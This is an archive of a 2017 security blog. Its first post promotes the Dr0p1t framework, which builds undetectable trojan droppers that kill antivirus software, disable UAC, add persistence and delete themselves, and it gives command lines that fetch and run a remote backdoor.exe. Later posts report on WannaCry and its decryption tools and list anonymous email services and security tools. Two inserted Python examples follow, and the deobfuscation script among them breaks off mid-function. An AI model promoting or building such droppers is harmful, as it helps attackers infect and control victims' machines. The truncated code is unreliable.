Friday, May 26, 2017

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2


Have you ever heard about trojan droppers?

In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a dropper that bypasses most AVs and has some tricks ;)

Features
  • The framework works on Windows and Linux
  • Downloads the executable to the target system and executes it silently
  • The executable is small compared to other droppers generated the same way
  • Self-destruct function so that the dropper kills and deletes itself after finishing its work
  • Adds the executable to startup after downloading it
  • Adds the executable to the task scheduler after downloading it (UAC does not matter)
  • Finds and kills the antivirus before running the malware
  • Runs a custom (batch|powershell|vbs) file of your choice before running the executable
  • The ability to disable UAC
  • When running PowerShell scripts it can bypass the execution policy
  • Uses UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3. The recommended version for Python 2 is 2.7.x and for Python 3 it is 3.5.x; don't use 3.6 because it is not yet supported by PyInstaller.
  • Python library requirements in requirements.txt

Needed dependencies for linux
  • Wine
  • Python 2.7 on Wine Machine
Note: you must have root access.

Installation
If you are on Linux, do:
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
And if you are on Windows, download it and then do:
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
The libraries in windows_requirements.txt are used to enable Unicode on Windows, which makes coloring possible.

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2
  • PyInstaller compiling on Linux using Wine
  • PyInstaller compiling on Windows will not use UPX, which fixes compiling on Windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added a SelfDestruct function so that the dropper kills and deletes itself after finishing its work
  • Full framework rewrite and recheck to fix errors and typos, and replaced some libraries to make the final file smaller
  • Started working on some SE tricks to fool the user; there are a lot of good options on the way ;) Stay tuned


Friday, May 19, 2017

WannaCry Ransomware Decryption Tool - WanaKiwi





If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.


WannaCry Ransomware Decryption Keys


WannaCry's encryption scheme works by generating a key pair on the victim's computer that is derived from two prime numbers: a "public" key for encrypting the system's files and a "private" key for decrypting them.
To prevent the victim from accessing the private key and decrypting the locked files himself, WannaCry erases the key from the system, leaving the victim no way to retrieve the decryption key except by paying the ransom to the attacker.

But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that tries to retrieve from memory the two prime numbers used in the formula that generates the encryption keys. It works on Windows XP only.

Note: Below I have also mentioned another tool, dubbed WanaKiwi, that works for Windows XP to Windows 7.


"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

So, that means, this method will work only if:
  • The affected computer has not been rebooted after being infected.
  • The associated memory has not been allocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.

"This is not really a mistake from the ransomware authors, as they properly use the Windows Crypto API."
Because WannaKey only pulls the prime numbers from the affected computer's memory, the tool is only useful to those who can use those primes to generate the decryption key themselves and decrypt their WannaCry-infected PC's files manually.
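The prime-recovery idea described above, worked through as an added example (this is not WannaKey's or WanaKiwi's code): a constructed memory image stands in for the wcry.exe heap, a sliding-window scan looks for any value that divides the public modulus n, and the RSA private exponent is rebuilt from what survives. It uses 64-bit primes so it runs instantly, the image layout and helper names are assumptions, and it also shows that a single surviving prime is enough, since the other is n divided by it, and that a wiped or reused buffer yields nothing, which is the "you need some luck" caveat.

```python
import random

PRIME_BYTES = 8   # 64-bit demo primes; a real 2048-bit WannaCry key has 128-byte primes
E = 65537         # RSA public exponent


def is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin primality test; adequate for generating the demo key."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits, rng):
    """Random prime of exactly `bits` bits with p-1 coprime to E, so d always exists."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if (cand - 1) % E != 0 and is_probable_prime(cand, rng):
            return cand


def make_memory_image(p, q, rng, size=4096):
    """Constructed stand-in for the wcry.exe heap: random noise with the two primes
    left behind at arbitrary offsets (assumed layout), stored little-endian as in
    CryptoAPI key blobs."""
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[700:700 + PRIME_BYTES] = p.to_bytes(PRIME_BYTES, "little")
    buf[3100:3100 + PRIME_BYTES] = q.to_bytes(PRIME_BYTES, "little")
    return bytes(buf)


def find_primes_in_memory(image, n, prime_bytes=PRIME_BYTES):
    """Slide a prime-sized window over the image. A window whose value divides n
    (other than 1 and n itself) can only be p or q, so no primality test is needed."""
    found = set()
    for off in range(len(image) - prime_bytes + 1):
        cand = int.from_bytes(image[off:off + prime_bytes], "little")
        if 1 < cand < n and n % cand == 0:
            found.add(cand)
            if len(found) == 2:
                break
    return found


def rebuild_private_exponent(n, e, factors):
    """Rebuild d from whatever was recovered; one factor suffices because q = n // p.
    Returns None when memory held neither prime."""
    if not factors:
        return None
    p = next(iter(factors))
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def demo(seed=2017, wipe=False):
    """Generate a key, lose the private half, recover it from the memory image and
    verify by decrypting a test ciphertext. wipe=True simulates the memory having
    been reused or zeroed (e.g. after a reboot), the case where the method fails."""
    rng = random.Random(seed)
    p = random_prime(PRIME_BYTES * 8, rng)
    q = random_prime(PRIME_BYTES * 8, rng)
    while q == p:
        q = random_prime(PRIME_BYTES * 8, rng)
    n = p * q
    image = make_memory_image(p, q, rng)
    if wipe:
        image = bytes(len(image))            # all zeros: nothing divides n
    factors = find_primes_in_memory(image, n)
    d = rebuild_private_exponent(n, E, factors)
    msg = int.from_bytes(b"test document", "big")   # 104 bits, well below n
    cipher = pow(msg, E, n)
    roundtrip = d is not None and pow(cipher, d, n) == msg
    return {"p": p, "q": q, "factors": factors, "d": d, "roundtrip": roundtrip}


if __name__ == "__main__":
    print(demo())
    print(demo(wipe=True))
```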


WanaKiwi: WannaCry Ransomware Decryption Tool



Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.

All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.

Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free even from Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Source: The Hacker News





Saturday, May 13, 2017

Ransomware That's Hitting the World Right Now Uses NSA Windows Exploit - WannaCry




Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date.

The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other nasty ransomware variants, WannaCry also blocks access to a computer or its files and demands money to unlock it.

Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in order to remove the infection from their PCs; otherwise, their PCs are rendered unusable and their files remain locked.

In separate news, researchers have also discovered a massive malicious email campaign that's spreading the Jaff ransomware at the rate of 5 million emails per hour and hitting computers across the globe.


Ransomware Using NSA's Exploit to Spread Rapidly


What's interesting about this ransomware is that WannaCry attackers are leveraging a Windows exploit harvested from the NSA called EternalBlue, which was dumped by the Shadow Brokers hacking group over a month ago.

Microsoft released a patch for the vulnerability in March (MS17-010), but many users and organizations who did not patch their systems are open to attacks.

The exploit can penetrate machines running unpatched versions of Windows XP through Server 2008 R2 by exploiting flaws in the Microsoft Windows SMB server. This is why the WannaCry campaign is spreading at such an astonishing pace.

Once a single computer in your organization is hit by the WannaCry ransomware, the worm looks for other vulnerable computers and infects them as well.


Infections from All Around the World


In just a few hours, the ransomware targeted over 45,000 computers in 74 countries, including the United States, Russia, Germany, Turkey, Italy, the Philippines and Vietnam, and the number was still growing, according to Kaspersky Labs.

According to one report, the ransomware attack has shut down work at 16 hospitals across the UK after doctors were blocked from accessing patient files. Another report says 85% of the computers at the Spanish telecom firm Telefonica were infected with this malware.

Another independent security researcher, MalwareTech, reported that a large number of U.S. organizations (at least 1,600) have been hit by WannaCry, compared to 11,200 in Russia and 6,500 in China.
Screenshots of the WannaCry ransomware with different languages, including English, Spanish, Italian, were also shared online by various users and experts on Twitter.

Bitcoin wallets seemingly associated with WannaCry have reportedly started filling up with cash.

The Spanish computer emergency response organization (CCN-CERT) has even issued an alert that warns users of the "massive attack of ransomware" from WannaCry, saying (translated version):
"The ransomware, a version of WannaCry, infects the machine by encrypting all its files and, using a remote command execution vulnerability through SMB, is distributed to other Windows machines on the same network."
It is unclear how the WannaCry ransomware initially infects systems, but the obvious attack vectors are phishing emails or victims visiting a website that hosts the malware.

"Power firm Iberdrola and utility provider Gas Natural were also reported to have suffered from the outbreak," according to the BBC.


How to Protect Yourself from WannaCry


First of all, if you haven't patched your Windows machines and servers against EternalBlue exploit (MS17-010), do it right now.

To safeguard against such ransomware infections, you should always be suspicious of uninvited documents sent by email and should never click on links inside those documents without verifying the source.

To always have a tight grip on all your important files and documents, keep a good backup routine in place that copies them to an external storage device that is not permanently connected to your PC.

Moreover, make sure that you run an active anti-virus security suite of tools on your system, and most importantly, always browse the Internet safely.


Source: The Hacker News

Sunday, May 7, 2017

20 Sites To Keep Your Identity Hidden - Send Anonymous Emails



The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right — our digital right. These email services are ‘free’ because of the advertisements.






Although deemed necessary evils, ads are mostly tailored for the visitor or service user, and to do that, service providers need your data to show you advertisements targeted to you and your user group. These are ads that you are most likely to click and/or follow.

Moreover, the disclosure of the motives of secret agencies and their top-secret internet-censoring programs (such as PRISM) has raised concerns among digital privacy advocates. If you want to keep your emails away from prying eyes, this article will introduce to you the many options for sending and receiving anonymous emails.

Anonymous email is the basic foundation of anonymity on the web. The Internet is not secure storage, but you do have a say in who has access to your data and who doesn't. If your answer is "no one", anonymous email is one way to ensure your emails are not trackable online.

Note: Anonymity is not possible on the web without hiding your IP address, so you must use Tor, or any other proxy or VPN service before using the services below to remain anonymous on the Internet.
Encrypted / Anonymous Email Service
Here are some of the anonymous email services that let you send and receive emails anonymously online. Some of them have encryption features; others are disposable or self-destruct after a specified period of time. Here are 5.

Anonymous Email – TorGuard – This service provides you an anonymous inbox with lots of privacy and cryptographic features. You get 10MB storage, and end-to-end security using SSL encryption for connection and G/PGP encryption for securing the messages.


Tor Mail – Tor Mail is a Tor Hidden service that provides truly anonymous email service. It runs on the hidden service network of The Tor Project so you must use Tor to access and use it. Tor Mail is developed for super anonymity. As it’s built over the Tor network, it cannot be traced easily.

GuerrillaMail – GuerrillaMail offers you a disposable, self-destructing, temporary email address to send and receive emails anonymously on the internet. Mail is deleted after an hour. You only need to choose an email address; no personal data is required.

Secure Mail – This service encrypts your mail using 4096-bit key, which makes it unreadable by anyone except you. It doesn’t ask for your personal information or IP address to sign up. They also have a zero-tolerance policy against spam.

The Anonymous Email – Create an account to send and receive emails by signing up with your real email. None of your other personal info is necessary.

Send Emails Without Registration

Sometimes you just need to send emails without prior registration. In fact, you don't even need to receive any reply. If this is you, here are 8 services that are essentially a form where you put in the details of the email you want to send. Note that there is no way for the receiver to get back to you.

AnonymousEmail.me – Here you will find only a simple form to fill in the receiver’s address, subject and the email content (you can also attach a file to the email if necessary). To get a reply, opt to provide a reply-to email address, otherwise this is a one-way ticket to sending an anonymous email.


5ymail – Send and receive beautifully formatted messages using its rich-text editor without revealing your true self. You will have to give up a real email address to receive your 5ymail inbox credentials. There is also a paid version with more features.

CyberAtlantis – It offers a simple interface to provide the receiver’s email address, subject, and the message. It strips off the IP address from your mail, and thus you can’t be traced easily. It asks for none of your personal information.

W3 Anonymous Remailer – Send anonymous emails to anyone. You only need to enter the receiver’s email address, subject and the message for the email.

Send Anonymous Email – This one has a plain interface to enter the sender's and receiver's addresses, subject and message. No other details are required to send emails with it. Note that IP addresses are logged.

Send Email Message – You only need to enter the receiver’s email address, subject, and the message. Over 100,000 anonymous emails are sent every day for free.

AnonEmail – You get to send anonymous emails without revealing any information about your identity.

Receive Emails

If you just need a disposable email to confirm links and don’t want to deal with the newsletter or other deals they might send you in the future, try these 7 email services. Accounts are created automatically when a mail is received for that address.

Anonymous Email – Hide My Ass! – Hide My Ass! offers a free anonymous email account, which can be used to receive (but not send) emails. You can opt for new email received notifications to be sent to your real email or even set your inbox to “self-destruct” with an expiration date. 


myTrashMail – Get open and public email accounts created upon receiving mail or sign up for a private and password-protected one to receive mail. The accounts are temporary and will be deleted automatically after some time.

NotSharingMy.Info – NotSharingMy.Info provides you with a permanent anonymous email address to receive emails without providing any traceable and identifiable information. It only requires your real email address for signing up. All emails to the anonymous email address is forwarded to your real email address.

Mailnesia – Aside from inboxes generated automatically upon receipt of an email, Mailnesia even features an automatic confirmation-links click system which is useful if you make lots of sign-ups on web services.

Mailinator – Here is one that lets you create email inboxes quickly and even automatically. You can only receive emails with it.


Spambog – Spambog offers you a disposable (7-day purge), temporary, anonymous email inbox on the Web. You can receive, reply and forward emails but not send an original one. An email alias can be protected with a password.

TempInbox – Here's another temporary, disposable, automated email inbox service. Give any email alias to anyone and check that inbox on the website for your incoming mail.

OffSec 2017

Saturday, May 6, 2017

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.4


Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

LDAP support

Yes, Faraday’s bucket list is an item shorter as of this release! LDAP support has been on the horizon for quite some time now, but not anymore - this brand new version comes with LDAP support out of the box, no additional modules required, isn’t that neat?

Why LDAP? Well, because a great number of companies around the world use it to centralize their user account management. The protocol provides total control over the credentials in all the platforms, which comes in pretty handy when managing large volumes of data. In fact, LDAP is so popular that some companies have a policy to only use tools that support LDAP authentication.

By adding LDAP support to Faraday, we give our clients the possibility to manage larger teams, implement large-scale installations and maintain a granular and simple control over their user accounts.

In addition, using Faraday over LDAP provides better configuration than ever, allowing complex credential policies such as password expiration and quality standards, or credential lockout.

Faraday Plugin

There are some changes to the Faraday Plugin, improving its functionality by allowing users to run it through the GTK interface, performing actions in batch and filtering objects.

One of the best things about this new version of the Plugin is that you can now use it to script some of the most boring tasks needed in every assessment.

Example of task automation using Faraday Plugin - Running ping for every host that has a service on port 22

We also added a menu option to run directly from GTK!


New menu item in GTK allows users to run Fplugin without having to type anything!
Read more about FPlugin in our documentation

Details are everything

And that is what this release is all about. We believe that correcting very specific details and introducing small improvements also adds quality and efficiency to a platform like ours. So it is in those items that we focused on the last iteration.

Changes

  • Added LDAP support for authentication
  • Removed grouping by issue tracker option in status report
  • Added command line option to automatically install the license files before launching Faraday
  • Fixed bug when editing workspaces with maximum allowed workspaces reached
  • Improved login in Web UI
  • Improved the validation applied to passwords when editing them in the Web UI

Better password validation

  • Improved UX in users list Web UI
  • Improved GTK UX when the client loses connection to the server
  • Added link to name column in Hosts list

Host names with links

  • Fixed bug in SQLMap plugin that made the client freeze
  • Fixed bug when creating/updating Credentials
  • Fixed bug in the Web UI - menu explanation bubbles were hidden behind inputs
  • Fixed conflict resolution when the object was deleted from another client before resolving the conflict
  • Improved FPlugin
  • Improved the installation process
  • Improved SQLMap plugin to support --tables and --columns options
  • Improved navigation in Web UI
  • Merged PR #137 - CScan improvements: bug fixing, change plugin format and removed unnecessary file output
  • Merged PR #173 - Hostnames: added hostnames to plugins
  • Merged PR #105 - OSint: added the possibility of using a DB other than Shodan
  • The Status Report now remembers the sorting column and order
  • Created a requirements_extras.txt file to handle optional packages for specific features

We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec 



The Hacker's ToolBox - PloitKit



PloitKit is a Python-based GUI tool designed as a one-stop shop for all other software. I kept facing the same problem: whenever I needed to switch to a different system, or lost my pen drive, I had to go to Google, search for every tool and download every tool one by one. So I decided to create a tool in which I just click and click and the tool is there.
I have added more than 900 tools, but only 400+ are available now, to test whether this tool works; if it does, I'll make all of them available for everyone.

Features
  1. Auto-Update - No need to come back here and look for a new version every time.
  2. Better Error Handling - Some tools may cause errors, which is why I added this option.
  3. Graphical Interface - For just click & click.
  4. Malware Protection - All tools are downloaded from their original source, so no malware or viruses.
  5. Multi-Platform - Many tools are designed differently for Mac, Windows & Linux, so I added an option for that. Choose your platform and you're good to go.
  6. Better organised - Everything is better organised; no more searching for everything and all that mess.
I believe that nothing can be perfect, so I added an option to report a tool, or to send me suggestions about any new tool I should add.

Usage
git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows
ploitkit.py

UNIX or Mac
python ploitkit.py




Friday, April 28, 2017

Kali Linux 2017.1 Release



Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack to create it. Kali Linux is the most versatile and advanced penetration testing operating system available. Kali tools are updated often and can be used on other platforms, such as VMware and ARM.

Today, Offensive Security has released Kali Linux 2017.1.

What’s new?

  • Support for RTL8812AU Wireless Card Injection
  • Streamlined Support for CUDA GPU Cracking
  • Amazon AWS and Microsoft Azure Availability (GPU Support)
  • OpenVAS 9 Packaged in Kali Repositories
For more info, please visit the Kali Linux home page.

How to update to Kali Linux 2017.1

Open a terminal and run these commands:
apt update
apt dist-upgrade
reboot
If you want to download a Kali Linux image for a fresh install, you can download Kali Linux 2017.1 here.

Sunday, April 23, 2017

51 Tools for Security Analysts - Offensive Sec


Reading this list may be worrying or intimidating for readers who don’t work in the security industry. You should know that all tools on this list are free and publicly accessible. They are also well known within the professional security community and among malicious actors. This list of tools, software and utilities should empower anyone interested in protecting themselves and their online assets by making you aware of the capabilities that exist for analysts and malicious actors. By better understanding the tools that your adversary uses, you can better protect yourself.

Information gathering and analysis

Google dorks – Using advanced operators in the Google search engine to locate specific strings of text within search results.

Using Google for penetration testing or malicious activity may seem silly or obvious, but Google is incredibly powerful and very popular among analysts and malicious actors alike. "Google dorks", or google-hacks as they're also known, are search queries that attackers use on Google to identify targets. If you visit a site like exploit-db.com or any other database of exploits, you'll find that many of them include Google dorks to help find targets to attack with the exploit.

Maltego – An interactive data mining tool that renders directed graphs for link analysis.
Maltego is one of our favorites. It is an investigator’s tool that lets you graphically organize your thoughts and your investigation by creating objects (people, places, devices, events) and link them. It also gives you the ability to run ‘transforms’ on objects. For example, you can run transforms on an IP address to list its malicious activity using external sources of threat intelligence. You can download a free version from Paterva which has some limitations.
You can see an example of the work we do with Maltego below.

FOCA – A tool used to find metadata and hidden information in the documents it scans.
When you create and publish MS Office, PDF, EPS and PS documents online, you may not realize how much information you are leaking to the general public. FOCA is a security analyst’s tool that can be used to extract ‘leaked’ data from documents that have been made public. Using FOCA, an analyst can find things like an organization’s network structure, IP addresses, internal server names, printers, shared folders, access control lists and more. You can watch this video filmed at DefCon 17 for a demo of how FOCA can be used by researchers or malicious actors to perform recon on a target organization or individual.

http://checkusernames.com/ – Check the use of a brand or username on 160 social networks.
If you simply want to find a unique username, checkusernames.com is a useful tool. If you are in the security field, it can be a powerful way to attribute an attack to a specific individual. Malware authors occasionally include usernames or ‘hacker names’ in their malware. Using this tool you can search 160 online services to see if they have used the same username somewhere else.

https://haveibeenpwned.com/ – Check if an account has been compromised in a data breach.
The term ‘pwned’ is slang for ‘owned’ which in the security industry means “to have your data or system compromised”. So ‘haveibeenpwned.com’ is slang for “Have I been owned dot com”. This is a well known and respected site run by Troy Hunt which finds and aggregates data from data breaches. You can use the service to find out if an account has been compromised by looking up your email or username.

https://www.beenverified.com/ – Search people & public records.
This is a general “people search” that is useful to find additional meta-data when researching a target during penetration testing or when researching an attacker.

Shodan – Search engine for Internet-connected devices.
This is a very popular service among security researchers. Shodan continually crawls and indexes devices on the internet. We recently used Shodan as part of our research into routers at several ISPs around the world that have been hacked and are now attacking WordPress. You can find a few example searches demonstrating Shodan’s use on their ‘explore’ page.

Censys – A search engine that allows computer scientists to ask questions about the devices and networks that compose the internet.
Censys is similar to Shodan in that it indexes devices and websites connected to the internet. The data is also searchable and differs from Shodan in some ways. Shodan is focused on ports and the services running on those ports. Censys is great at indexing web site SSL certificates among other things. Censys is maintained by a team of computer scientists at the University of Michigan and University of Illinois Urbana-Champaign.

Gephi – Visualization and exploration software for all kinds of graphs and networks.
We mentioned Maltego earlier in this post. It uses a ‘graph’ structure which is a diagram of linked objects to represent relationships. Gephi is a tool to analyze graph data at massive scale. We used Gephi to generate the graphical representations of attack data that we published in our February Attack report, seen below.


Fierce – A DNS reconnaissance tool for finding target IPs associated with a domain.
Fierce is a tool used to find IP addresses that are potential attack targets associated with a specific domain. It is used by penetration testers when evaluating insecure points on a network.

BuiltWith – Find out what websites are built with.
BuiltWith has a search engine-like interface and lets you search for a specific site to find out what tools were used to build it. BuiltWith also aggregates that data so that you can find out what the most popular technologies are on the web or how a specific technology is trending relative to another.

Wappalyzer – A cross-platform utility that uncovers the technologies used on websites.
Wappalyzer is another tool that helps you discover what technologies a specific site is using. Like BuiltWith, they also aggregate data to help you determine how technologies are trending. This is their view of the popularity of blog technologies, with WordPress clearly the market leader.


Wappalyzer Chrome extension
Wappalyzer also has a browser extension for Chrome that lets you immediately see the technologies a specific site is using. There is also a Python driver available on github called python-Wappalyzer.

https://aw-snap.info/ – Tools for owners of hacked websites to help find malware and recover their site.
aw-snap.info includes a suite of tools that may be helpful for site owners who have decided to try to clean their own hacked site. It can help you fetch pages as Google, which sometimes reveals malware. It can also decode base64 obfuscated malware and help find obfuscation in your files that may hide malware.

http://themecheck.org/ – A quick service that lets you verify WordPress themes for security and code quality.
ThemeCheck may help you verify your theme integrity by uploading it. It can also help find malware embedded in themes.

theHarvester – Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN.
This is a tool that performs a variety of reconnaissance operations on an organization and may be useful in the early stages of a penetration test to determine an organization’s overall online footprint.

Cymon.io – Tracker of malware, phishing, botnets, spam, and more.
Cymon can help you research a potentially malicious IP or malware hash. 

Mnemonic – A passive DNS database.
Mnemonic is a useful tool that can find which websites are hosted at a specific IP or which IPs host a website.

Vulnerability scanning and penetration testing

WPScan – A black box WordPress vulnerability scanner.
WPScan is a command line tool that is used to remotely scan WordPress sites for vulnerabilities.

Sqlmap – An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

SQLMap is widely used among penetration testers and is highly effective at finding and exploiting SQL injection vulnerabilities in target sites.

BeEF – A penetration testing tool that focuses on the web browser.
BeEF is a powerful tool that lets penetration testers exploit and control a web browser. Using BeEF you can set up a malicious website, exploit a visiting browser and gain access to the workstation running the browser. You can watch this 2014 KiwiCon video for a demo.

Firefox Hackbar – A simple security audit / penetration test tool.

Hackbar is a plugin for Firefox that may help application developers perform security audits on their own web applications. It includes a variety of tools to assist with this task.

Burp Suite – Software for web security testing.

Burp Suite is a very well known and powerful framework used to perform security audits and analysis on web applications. It includes a proxy that can intercept traffic and allow you to modify it on the fly. It includes a huge variety of exploit and penetration testing tools.

OpenVAS – An open source vulnerability scanner and manager.
You have probably heard of the vulnerability scanning tool Nessus. Back in 2005 Tenable Network Security changed the Nessus open source license to a closed source one. The developers forked the project at that time and created OpenVAS.
I’ve found that OpenVAS can be quite effective, but it is a bit more challenging to set up than Nessus. OpenVAS does have the advantage of being completely free and open source. The project is well known throughout the online security community.

Fiddler – A free web debugging proxy.
Fiddler is a proxy server that lets you intercept requests to a website, view them in different ways, modify the requests and can help debug websites and perform security audits.

Joomscan – Detect Joomla CMS vulnerabilities and analyze them.
Joomscan is the Joomla CMS’s equivalent of wpscan.

Kum0nga – A simple Joomla scan.
This is another Joomla vulnerability scanner.

Arachni – A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications.
Arachni is a framework to perform detailed vulnerability scanning on web applications.

Forensics and log analysis

Lnav – An advanced log file viewer.
Lnav is short for log file navigator. It automatically detects your log file formats, provides syntax highlighting and a host of other features to view and analyze log files. It can be invaluable when analyzing a compromised website.

Mandiant Highlighter – A free log file analysis tool.
Mandiant (now owned by FireEye) produced this useful product that can help analyze log files. It includes the ability to graphically view a histogram of log files and several other powerful log file analysis features.

Wp-file-analyser – Find modified, missing and extra files in a WordPress directory.
This utility can download the original versions of WordPress core and plugin files and can help you compare them against their originals.

Auditd – Access monitoring and accounting for Linux.
Access monitoring and logging/accounting is very helpful when monitoring a system to see if it is being attacked or performing an investigation after the attack. Auditd can help you improve logging and provide an audit trail on Linux.

Araxis Merge – Advanced 2 and 3-way file comparison (diff), merging and folder synchronization.
When responding to a hack, the ability to compare files to originals to determine what has changed is important. Araxis Merge is a powerful tool that can assist with this.

WinMerge – An Open Source differencing and merging tool for Windows.
Much like Araxis Merge, WinMerge can help you compare files to examine changes when responding to an incident.

DiffNow – Compare files online.
DiffNow is a web based file ‘diff’ tool that can also assist when comparing file differences during incident response.

Code and malware analysis

CyberChef – the Cyber Swiss Army Knife
CyberChef is a tool that is developed by GCHQ, the British intelligence agency. It can help de-obfuscate malware and other code.

UnPHP – A free service for analyzing obfuscated and malicious PHP code.
Obfuscating (hiding/garbling) PHP is a favorite technique of hackers; UnPHP can help analyze obfuscated code.

UnPacker – JavaScript unpacker.

Jsunpack – A generic JavaScript unpacker.
‘Packing’ JavaScript is a favorite technique of hackers who are dropping malicious JavaScript on websites. It makes their code more compact and harder to read. Jsunpack can help de-obfuscate JS code to make it more readable so that you can understand how it operates.

JSBeautifier – An online JavaScript beautifier.
Much like Jsunpack, JSBeautifier helps improve the readability of packed JavaScript code.

https://www.base64decode.org/ – Base64 Decode and Encode
Base64 encoding is a way to encode anything into an encoded string of (what appears to be) random characters. Anyone who is repairing hacked sites or responding to incidents uses base64 decoding several times a day to expose malicious code that has been base64 encoded. This tool can help decode base64 encoding.

https://www.urldecoder.org/ – URL Decode and Encode
URL encoding is another popular way for hackers to hide their code. urldecoder.org can help you decode malicious code that has been hidden using URL encoding.
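The aw-snap.info, base64 and URL-decoding entries above all come down to the same chore: peeling encoding layers off a file until the code they hide is readable. As an added example (not code from any tool listed on this page), the Python script below does that on a constructed sample injected into a PHP file and flags the PHP constructs found at each layer; the regexes, marker list and sample are assumptions made for the example.

```python
import base64
import re
from urllib.parse import unquote

# Added example, not code from any tool on the page: peel base64 and
# URL-encoding layers off a file so the code they conceal can be read.
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")     # long base64-looking runs
URLENC_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){3,}")    # runs of %XX escapes
# PHP constructs worth a second look once a layer has been decoded (assumed list).
MARKERS = ("eval(", "base64_decode(", "system(", "shell_exec(",
           "passthru(", "assert(", "gzinflate(", "preg_replace(")

def decode_b64(blob):
    """Decode blob if it is valid base64 yielding readable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c.isspace() for c in text) else None

def decode_layers(text, max_depth=5):
    """Follow the first decodable base64 or URL-encoded run, layer by layer."""
    chain = []
    for _ in range(max_depth):
        found = next((d for d in map(decode_b64, B64_RE.findall(text)) if d), None)
        if found is None:
            m = URLENC_RE.search(text)
            found = unquote(m.group(0)) if m else None
        if found is None:
            break
        chain.append(found)
        text = found
    return chain

def suspicious_markers(text):
    """Markers present in one layer, sorted for stable reporting."""
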